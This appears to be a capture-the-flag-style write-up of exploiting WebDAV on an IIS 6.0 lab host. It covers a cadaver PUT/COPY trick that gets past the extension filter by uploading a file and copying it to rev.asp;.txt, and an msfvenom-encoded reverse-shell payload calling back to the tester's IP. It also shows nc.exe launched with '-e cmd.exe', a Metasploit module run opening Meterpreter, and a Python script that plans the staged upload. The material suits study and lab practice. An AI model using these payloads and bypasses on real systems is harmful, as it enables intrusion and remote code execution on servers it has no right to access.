3 :80 webdav exploit

Nikto showed:

  • Retrieved dasl header: DAV:sql

  • Retrieved dav header: 1, 2

  • Retrieved ms-author-via header: MS-FP/4.0,DAV

  • Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV

The DAV and MS-Author-Via headers mean WebDAV is enabled on the site (MS-FP/4.0 is the FrontPage Server Extensions banner), so the PUT/WebDAV method from https://book.hacktricks.xyz/pentesting/pentesting-web/put-method-webdav applies.

$ echo "WORKS" > test.txt
$ cadaver 10.10.10.15
dav:/> put test.txt
Uploading test.txt to `/test.txt':
Progress: [=============================>] 100.0% of 6 bytes succeeded.
http://10.10.10.15/test.txt
WORKS

# PUT works for plain files, but a script extension is rejected:
dav:/> put shell.aspx
Uploading shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 15970 bytes failed:
403 Forbidden

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=443 -e "x86/shikata_ga_nai" -f asp -o rev.asp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of asp file: 38284 bytes
Saved as: rev.asp

$ mv rev.asp rev.txt

dav:/> put rev.txt
Uploading rev.txt to `/rev.txt':
Progress: [=============================>] 100.0% of 38284 bytes succeeded.
dav:/> copy rev.txt rev.asp;.txt
Copying `/rev.txt' to `/rev.asp%3b.txt':  succeeded.

# The extension filter only applies to PUT; COPY/MOVE are not filtered (METHOD 2 moves straight to .asp).
# The ';.txt' suffix additionally relies on IIS 6 stopping at the ';' when it resolves the handler, so rev.asp;.txt runs as ASP.
# Start the listener first, then request the copied file to trigger the payload:
http://10.10.10.15/rev.asp;.txt
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1031
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv> whoami
nt authority\network service
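The manual cadaver steps above are the whole technique: an OPTIONS check for write methods, a PUT that is filtered by extension, and a COPY/MOVE that is not. The script below is an added example (not part of the original notes or of any tool referenced on the page) that automates that reasoning: it parses an OPTIONS reply for WebDAV write methods and builds the staged PUT -> COPY -> GET request sequence. The SAMPLE_OPTIONS reply is constructed to look like an IIS 6.0 response and was not captured from 10.10.10.15; `probe()` is the only part that touches the network.

```python
"""Probe a WebDAV host for write methods and plan the .txt -> .asp;.txt
upload trick used in the cadaver session above (added example)."""
import http.client
import sys

# Methods that let an unauthenticated client change the webroot.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}


def parse_options_response(raw):
    """Summarise the header block of an HTTP OPTIONS reply.

    `raw` is the status line plus headers as one string (no body needed).
    Returns the advertised methods, the write-capable subset, the DAV
    compliance classes, the MS-Author-Via value and the Server banner.
    """
    lines = raw.replace("\r\n", "\n").strip().split("\n")
    headers = {}
    for line in lines[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    methods = set()
    # IIS lists methods in both 'Allow' and 'Public'; merge them.
    for field in ("allow", "public"):
        methods |= {m.strip().upper() for m in headers.get(field, "").split(",") if m.strip()}
    return {
        "server": headers.get("server", ""),
        "dav": headers.get("dav", ""),
        "ms_author_via": headers.get("ms-author-via", ""),
        "methods": sorted(methods),
        "write_methods": sorted(methods & WRITE_METHODS),
        "webdav": "dav" in headers,
    }


def plan_staged_upload(host, local_script):
    """Return the (method, path, headers) steps that bypass a PUT extension filter.

    PUT /<name>.txt is accepted, COPY renames it to <name>.<ext>;.txt (the
    filter is not applied to COPY/MOVE, and IIS 6 resolves the handler from
    the part before ';'), and a GET of the copy runs the payload. The
    Destination URL percent-encodes ';' as %3b, which is what cadaver sent.
    """
    base, _, ext = local_script.rpartition(".")
    staged = f"/{base}.txt"
    final = f"/{base}.{ext};.txt"
    destination = f"http://{host}/{base}.{ext}%3b.txt"
    return [
        ("PUT", staged, {"Content-Type": "text/plain"}),
        ("COPY", staged, {"Destination": destination, "Overwrite": "T"}),
        ("GET", final, {}),  # requesting the copy executes it server-side
    ]


def probe(host, port=80):
    """Send OPTIONS / to a live host and return the parsed summary (network)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("OPTIONS", "/")
    resp = conn.getresponse()
    raw = f"HTTP/1.1 {resp.status} {resp.reason}\n" + "\n".join(
        f"{k}: {v}" for k, v in resp.getheaders())
    conn.close()
    return parse_options_response(raw)


# Constructed sample (assumption: typical IIS 6.0 WebDAV reply, not a capture
# from the target) so the parser can be exercised offline.
SAMPLE_OPTIONS = """HTTP/1.1 200 OK
Date: Thu, 06 May 2021 17:19:53 GMT
Server: Microsoft-IIS/6.0
MS-Author-Via: MS-FP/4.0,DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    summary = probe(target) if target else parse_options_response(SAMPLE_OPTIONS)
    print(f"{summary['server']}  DAV={summary['dav']}  MS-Author-Via={summary['ms_author_via']}")
    print("write methods:", ", ".join(summary["write_methods"]) or "none")
    writable = set(summary["write_methods"])
    if "PUT" in writable and ({"COPY", "MOVE"} & writable):
        for method, path, hdrs in plan_staged_upload(target or "10.10.10.15", "rev.asp"):
            print(f"  {method} {path} {hdrs}")
```

Run it with no argument to see the plan for the constructed reply, or with a host to send a real OPTIONS request. Sending the staged requests themselves is left to cadaver or curl so the script stays a read-only check apart from that one OPTIONS call.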


# shell was very unstable

METHOD 1: nc.exe

$ cp /usr/share/windows-resources/binaries/nc.exe .
$ mv nc.exe nc.txt
# upload nc.txt with cadaver and copy it to nc.exe in the webroot, same put/copy steps as for rev.asp;.txt above
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1039
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

# with a second listener already waiting on 6969, spawn a fresh shell from the uploaded binary:
c:\windows\system32\inetsrv> C:\Inetpub\wwwroot\nc.exe 10.10.14.12 6969 -e cmd.exe

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1040
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>

METHOD 2: msf windows/iis/iis_webdav_upload_asp (automates the .txt upload and the MOVE to .asp)

msf6 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.14:4444
[*] Checking /metasploit58023674.asp
[*] Uploading 609574 bytes to /metasploit58023674.txt...
[*] Moving /metasploit58023674.txt to /metasploit58023674.asp...
[*] Executing /metasploit58023674.asp...
[*] Deleting /metasploit58023674.asp (this doesn't always work)...
[*] Sending stage (175174 bytes) to 10.10.10.15
[!] Deletion failed on /metasploit58023674.asp [403 Forbidden]
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.15:1032) at 2021-05-06 10:19:53 -0700

meterpreter > 
